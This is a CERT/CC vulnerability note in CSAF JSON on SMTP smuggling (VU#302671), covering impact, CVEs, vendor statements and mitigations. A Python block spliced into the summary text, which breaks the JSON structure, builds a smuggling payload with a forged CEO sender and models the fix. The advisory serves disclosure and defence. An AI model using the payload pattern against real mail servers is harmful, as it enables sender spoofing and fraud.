{"document":{"acknowledgments":[{"urls":["https://kb.cert.org/vuls/id/302671#acknowledgements"]}],"category":"CERT/CC Vulnerability Note","csaf_version":"2.0","notes":[{"category":"summary","text":"### Overview\r\n\r\nA vulnerability has been found in the way that SMTP servers and software handle the end-of-data sequence (the sequence that marks the end of a single email message). Because implementations disagree on which sequences terminate a message, an attacker can craft an email message that bypasses SMTP security policies.\r\n\r\n### Description\r\n\r\nSMTP (see [RFC 5321](https://www.rfc-editor.org/rfc/rfc5321) and [RFC 5322](https://www.rfc-editor.org/rfc/rfc5322)) is the Internet protocol for e-mail transmission and exchange. Several SMTP servers typically relay an email as it travels between a sender and a recipient, so a chain of next-hop servers may handle a message before it is delivered to the intended recipient. Priority-based Mail eXchange (MX) records also allow email to be delivered to alternate servers or partner gateways that spool and deliver it during outages. To prevent fraudulent email, email software and services authenticate the submitting user and apply security policies such as DMARC (essentially a combination of SPF and DKIM) to verify an email's origin as it traverses these services.\r\n\r\nSecurity researcher Timo Longin at SEC Consult discovered that email software deployed across numerous SMTP servers treats the end-of-data sequence inconsistently. An attacker can exploit this inconsistency by crafting an email message that deviates from the standard end-of-data sequence, so that the message is interpreted differently as it is transferred to its next hop. An email server in the route of SMTP gateways processing this manipulated message may interpret the submitted data as multiple messages, then process and relay each of them onward. 
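The following is an added example, not code from this advisory, CERT/CC, SEC Consult or any vendor: a small Python model of the composition described above. One function plays the originating server (strict: only `<CRLF>.<CRLF>` ends DATA), another plays a receiving server that is assumed to also accept a bare LF or bare CR around the dot, and a constructed submission containing an `<LF>.<CRLF>` sequence followed by a second envelope is pushed through both. The lenient receiver reports two messages, the second with a forged `MAIL FROM`. The same block models the cleaning fix (normalise bare CR/LF before dot-stuffing on relay) and shows that it collapses the submission back to one message. The addresses, the exact terminator sequences a given product accepts, and the cleaning behaviour are all assumptions made for the example.

```python
# Added model of SMTP smuggling for this advisory (not CERT/CC, SEC Consult or
# vendor code).  All addresses, terminator sets and the submission are constructed.

CR = bytes([13])
LF = bytes([10])
CRLF = CR + LF

STRICT_EOLS = (CRLF,)            # RFC 5321: DATA ends only at <CRLF>.<CRLF>
LENIENT_EOLS = (CRLF, LF, CR)    # assumed lenient server: bare LF/CR also accepted


def find_end_of_data(stream, eols):
    '''Return (offset, length) of the earliest <eol>.<eol> in stream, or None.'''
    best = None
    for before in eols:
        for after in eols:
            marker = before + b'.' + after
            i = stream.find(marker)
            if i != -1 and (best is None or i < best[0]):
                best = (i, len(marker))
    return best


def receive_session(stream, eols, mail_from='attacker@example.com',
                    rcpt_to='victim@example.org'):
    '''Model a receiving MTA that has just accepted DATA with the given
    (constructed) envelope.  It reads content up to the first terminator it
    recognises, then parses whatever follows as further SMTP commands, as a
    real server would.  Returns (mail_from, rcpt_to, content) per message.
    Dot-unstuffing is omitted; it does not change where a message ends.'''
    messages = []
    while True:
        hit = find_end_of_data(stream, eols)
        if hit is None:
            return messages                 # server would wait for more bytes
        i, n = hit
        messages.append((mail_from, rcpt_to, stream[:i]))
        stream = stream[i + n:]
        mail_from, rcpt_to = None, None
        while stream:                       # leftover bytes become commands
            nl = stream.find(CRLF)
            if nl == -1:
                return messages
            line, stream = stream[:nl], stream[nl + 2:]
            upper = line.upper()
            if upper.startswith(b'MAIL FROM:'):
                mail_from = line[10:].strip(b'<> ').decode()
            elif upper.startswith(b'RCPT TO:'):
                rcpt_to = line[8:].strip(b'<> ').decode()
            elif upper == b'DATA':
                break
            elif upper == b'QUIT':
                return messages
        else:
            return messages                 # no further DATA command
        if mail_from is None or rcpt_to is None:
            return messages                 # DATA without envelope is rejected


def forward(content, clean_bare=False):
    '''Model the originating MTA relaying stored content: split on its own
    line ending (CRLF), dot-stuff lines starting with a dot (RFC 5321 4.5.2)
    and append <CRLF>.<CRLF>.  clean_bare=True first normalises bare CR and
    bare LF to CRLF, the kind of fix vendors describe (assumed behaviour).'''
    if clean_bare:
        content = content.replace(CRLF, LF).replace(CR, LF).replace(LF, CRLF)
    if not content.endswith(CRLF):
        content += CRLF
    lines = content.split(CRLF)[:-1]
    stuffed = [b'.' + line if line.startswith(b'.') else line for line in lines]
    return CRLF.join(stuffed) + CRLF + b'.' + CRLF


# Constructed submission: <LF>.<CRLF> in the middle is content to a strict
# server but an end-of-data marker to a lenient one.
SMUGGLED = (
    b'From: attacker@example.com' + CRLF + b'To: victim@example.org' + CRLF +
    b'Subject: outer message' + CRLF + CRLF + b'Visible body.' + CRLF +
    LF + b'.' + CRLF +                            # non-standard terminator
    b'MAIL FROM:<ceo@example.com>' + CRLF +       # smuggled envelope...
    b'RCPT TO:<victim@example.org>' + CRLF + b'DATA' + CRLF +
    b'From: ceo@example.com' + CRLF + b'Subject: smuggled message' + CRLF +
    CRLF + b'Please wire the funds.' + CRLF +     # ...and smuggled message
    b'.' + CRLF                                   # the real <CRLF>.<CRLF>
)


def demo():
    '''Message counts at the originating server, at a lenient next hop after a
    verbatim relay, and at the same next hop after a cleaning relay.'''
    accepted = receive_session(SMUGGLED, STRICT_EOLS)
    stored = accepted[0][2]
    vulnerable = receive_session(forward(stored), LENIENT_EOLS)
    hardened = receive_session(forward(stored, clean_bare=True), LENIENT_EOLS)
    return len(accepted), len(vulnerable), len(hardened)


if __name__ == '__main__':
    print(demo())   # (1, 2, 1)
```

Running the block prints the three counts. The point to take from it is the composition: neither server is broken on its own; the originating server stores the bare-LF dot line as ordinary content and relays it verbatim without dot-stuffing (because on its own CRLF line discipline that line does not start with a dot), and the lenient next hop then reads the same bytes as a terminator followed by fresh commands. Cleaning bare CR/LF before relay turns the smuggled dot line into a real line, which gets stuffed and so can no longer terminate DATA downstream.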
Postfix software developer Wietse Venema explained:\r\n\r\n> The attack involves a COMPOSITION of two email services with specific differences in the way they handle line endings other than CR LF\r\n\r\nSEC Consult researchers have named this vulnerability \"SMTP Smuggling\". The problem involves multiple stakeholders, such as email service providers, email software vendors, email security product vendors and others that process and handle email.\r\n\r\n**VU#302671**\r\nAn improper end-of-data sequence handling vulnerability in email software, services or appliances allows attackers to inject arbitrary email messages that can bypass security policies.\r\n\r\nAn [Openwall](https://www.openwall.com/lists/oss-security/2023/12/24/1) community discussion also led to the reservation of the following CVE IDs:\r\n\t<table>\r\n\t\t<tr><td>Exim</td><td>[CVE-2023-51766](https://www.cve.org/CVERecord?id=CVE-2023-51766)</td></tr>\r\n\t\t<tr><td>Postfix</td><td>[CVE-2023-51764](https://www.cve.org/CVERecord?id=CVE-2023-51764)</td></tr>\r\n\t\t<tr><td>Sendmail</td><td>[CVE-2023-51765](https://www.cve.org/CVERecord?id=CVE-2023-51765)</td></tr>\r\n\t</table>\r\n\r\n### Impact\r\n\r\nAn attacker with access to an SMTP service can craft an email with an improper end-of-data sequence so that a single submission is accepted as two or more email messages, which can be used to bypass security policy. When the attack is successful, the attacker can impersonate any sender in any domain that is hosted at the originating mail service. The attacker can also evade in-place email handling policies, since email security scanners and gateways that analyze the submission are misled by the improper sequencing of the message. 
\r\n\r\n### Solution\r\n\r\n#### Email Service Providers and Administrators\r\nEnsure that your email software is up to date and that you have applied the workarounds and/or patches provided by your software vendor. Check the *Vendor Information* section for instructions and links to the respective advisories. If you use email security appliances or managed email gateways, ensure that their software is up to date and configured to mitigate these attacks and reduce the risk of improper message relay to other SMTP servers. Ensure that any backup MX services, including those hosted by partners, are also protected from misuse or abuse. Email service providers are also urged to perform sender verification and header verification on every email, so that the identity of the authenticated sender is properly represented in the submitted message.\r\n\r\n#### Email end users\r\nAs email sender verification continues to be a challenge on the Internet, email users are urged to remain cautious when replying to emails with sensitive information or when clicking on links that can download or install malicious software.\r\n\r\n#### Additional Resources\r\n\r\nSEC Consult has provided both [software](https://github.com/The-Login/SMTP-Smuggling-Tools) and a [website](https://www.smtpsmuggling.com) to help service providers and software vendors verify whether their software and services are susceptible to these attacks.\r\n\r\n### Acknowledgements\r\nThanks to the reporter Timo Longin from SEC Consult. 
This document was written by Timur Snoke and Vijay Sarvepalli","title":"Summary"},{"category":"legal_disclaimer","text":"THIS DOCUMENT IS PROVIDED ON AN 'AS IS' BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. ","title":"Legal Disclaimer"},{"category":"other","text":"CERT/CC Vulnerability Note is a limited advisory. It primarily identifies vendors impacted by the advisory and not specific products. We only support \"known_affected\" and \"known_not_affected\" status. Please consult the vendor's statement and advisory URL, if provided by the vendor, for more details.","title":"Limitations of Advisory"},{"category":"other","text":"The behavior on Cisco Secure Mail is configurable.\r\n\r\nCisco recommends using the default \"Clean messages of bare CR and LF characters\" option because it provides the best compromise between security and interoperability. However, customers using this setting should be aware of the security implications in regards to smuggled content. Customers who want to enforce RFC compliance should choose \"Reject messages with bare CR or LF characters,\" being aware of the potential interoperability issues.\r\n\r\nIn any case, Cisco strongly recommends configuring and using features such as SPF, DomainKeys Identified Mail (DKIM), or DMARC in order to validate the sender of an incoming message.","title":"Vendor statement from Cisco"},{"category":"other","text":"Open source sendmail is affected by this vulnerability. A fix is part of the sendmail 8.18.1 release.  This version enforces stricter RFC compliance by default, especially with respect to line endings.  
This may cause issues with receiving messages from non-compliant MTAs; please see the release notes for mitigations.","title":"Vendor statement from Sendmail Consortium"},{"category":"other","text":"SurgeMail is vulnerable to the SMTP Smuggling Injection issue as it is unduly 'forgiving' when it comes to line termination, in line with other common mail servers. This flexibility was originally added to allow legacy or 'bad' email clients/scripts to work.\r\n\r\nAs a quick fix, add the setting:\r\n\r\ng_lf_fix_off \"true\"\r\n\r\nFuture releases will work correctly regardless of the above setting.\r\n\r\nIf your system needs this legacy behaviour for some reason, please upgrade to SurgeMail 7.7l3 or later, then set g_lf_fix_list \"1.2.3.4\" to the IP address of any legacy device.\r\n\r\nSee this page for updated information: https://surgemail.com/knowledge-base/smtp-smuggling/","title":"Vendor statement from NetWin"},{"category":"other","text":"Postfix versions prior to 3.8.4, 3.7.9, 3.6.13, and 3.5.23 accept non-standard End-of-DATA sequences, and are therefore affected by SMTP smuggling. 
For more information, see https://www.postfix.org/smtp-smuggling.html","title":"Vendor statement from Postfix"}],"publisher":{"category":"coordinator","contact_details":"Email: cert@cert.org, Phone: +1412 268 5800","issuing_authority":"CERT/CC under DHS/CISA https://www.cisa.gov/cybersecurity also see https://kb.cert.org/ ","name":"CERT/CC","namespace":"https://kb.cert.org/"},"references":[{"url":"https://certcc.github.io/certcc_disclosure_policy","summary":"CERT/CC vulnerability disclosure policy"},{"summary":"CERT/CC document released","category":"self","url":"https://kb.cert.org/vuls/id/302671"},{"url":"https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/","summary":"https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/"},{"url":"https://www.postfix.org/smtp-smuggling.html","summary":"https://www.postfix.org/smtp-smuggling.html"},{"url":"https://github.com/The-Login/SMTP-Smuggling-Tools","summary":"https://github.com/The-Login/SMTP-Smuggling-Tools"},{"url":"https://learn.microsoft.com/en-us/archive/blogs/tzink/what-do-we-mean-when-we-refer-to-the-sender-of-an-email","summary":"https://learn.microsoft.com/en-us/archive/blogs/tzink/what-do-we-mean-when-we-refer-to-the-sender-of-an-email"},{"url":"https://www.smtpsmuggling.com","summary":"https://www.smtpsmuggling.com"},{"url":"https://www.cisco.com/c/en/us/support/docs/security/email-security-appliance-c690x/221532-response-to-cisco-secure-email-smtp-smug.html","summary":"Reference(s) from vendor \"Cisco\""},{"url":"https://surgemail.com/knowledge-base/smtp-smuggling/","summary":"Reference(s) from vendor \"NetWin\""}],"title":"SMTP end-of-data uncertainty can be abused to spoof emails and bypass policies","tracking":{"current_release_date":"2024-01-31T18:07:52+00:00","generator":{"engine":{"name":"VINCE","version":"3.0.35"}},"id":"VU#302671","initial_release_date":"2024-01-16 15:53:55.902931+00:00","revision_history":[{"date":"2024-01-31T18:07:52+00:00","number":"1.20240131180752.6","summary":"Released on 2024-01-31T18:07:52+00:00"}],"status":"final","version":"1.20240131180752.6"}},"vulnerabilities":[{"title":"An improper end-of-data sequence handling vulnerability in email software, services or appliances allows attackers to inject arbitrary email messages that can bypass security policies.","notes":[{"category":"summary","text":"An improper end-of-data sequence handling vulnerability in email software, services or appliances allows attackers to inject arbitrary email messages that can bypass security policies. CVE-2023-51764 (Postfix), CVE-2023-51765 (Sendmail) and CVE-2023-51766 (Exim) were reserved."}],"ids":[{"system_name":"CERT/CC V Identifier ","text":"VU#302671"}],"references":[{"url":"https://www.postfix.org/smtp-smuggling.html","summary":"Affected. When receiving email from an originating email service that passes on non-standard end-of-data forms in message content, Postfix as a destination SMTP server did not distinguish between a smuggled message and a non-smuggled message, and subjected each message to the exact same policies with respect to envelope, headers, and content, whereas the smuggled envelope and headers had not been subject to the originating email service policies.\r\n\r\nOpt-in fixes have been released for supported Postfix releases 3.5, 3.6, 3.7, 3.8. 
An opt-out fix is available for Postfix 3.9.","category":"external"}],"product_status":{"known_affected":["CSAFPID-413b712a-39cf-11f1-8422-122e2785dc9f","CSAFPID-413cba44-39cf-11f1-8422-122e2785dc9f","CSAFPID-413d98a6-39cf-11f1-8422-122e2785dc9f"],"known_not_affected":["CSAFPID-413bc01c-39cf-11f1-8422-122e2785dc9f","CSAFPID-413c339e-39cf-11f1-8422-122e2785dc9f","CSAFPID-413d02a6-39cf-11f1-8422-122e2785dc9f","CSAFPID-413d45c2-39cf-11f1-8422-122e2785dc9f"]}}],"product_tree":{"branches":[{"category":"vendor","name":"Sendmail Consortium","product":{"name":"Sendmail Consortium Products","product_id":"CSAFPID-413b712a-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Zoho","product":{"name":"Zoho Products","product_id":"CSAFPID-413bc01c-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Cisco","product":{"name":"Cisco Products","product_id":"CSAFPID-413c339e-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Postfix","product":{"name":"Postfix Products","product_id":"CSAFPID-413cba44-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Siemens","product":{"name":"Siemens Products","product_id":"CSAFPID-413d02a6-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Yahoo Inc.","product":{"name":"Yahoo Inc. Products","product_id":"CSAFPID-413d45c2-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"NetWin","product":{"name":"NetWin Products","product_id":"CSAFPID-413d98a6-39cf-11f1-8422-122e2785dc9f"}}]}}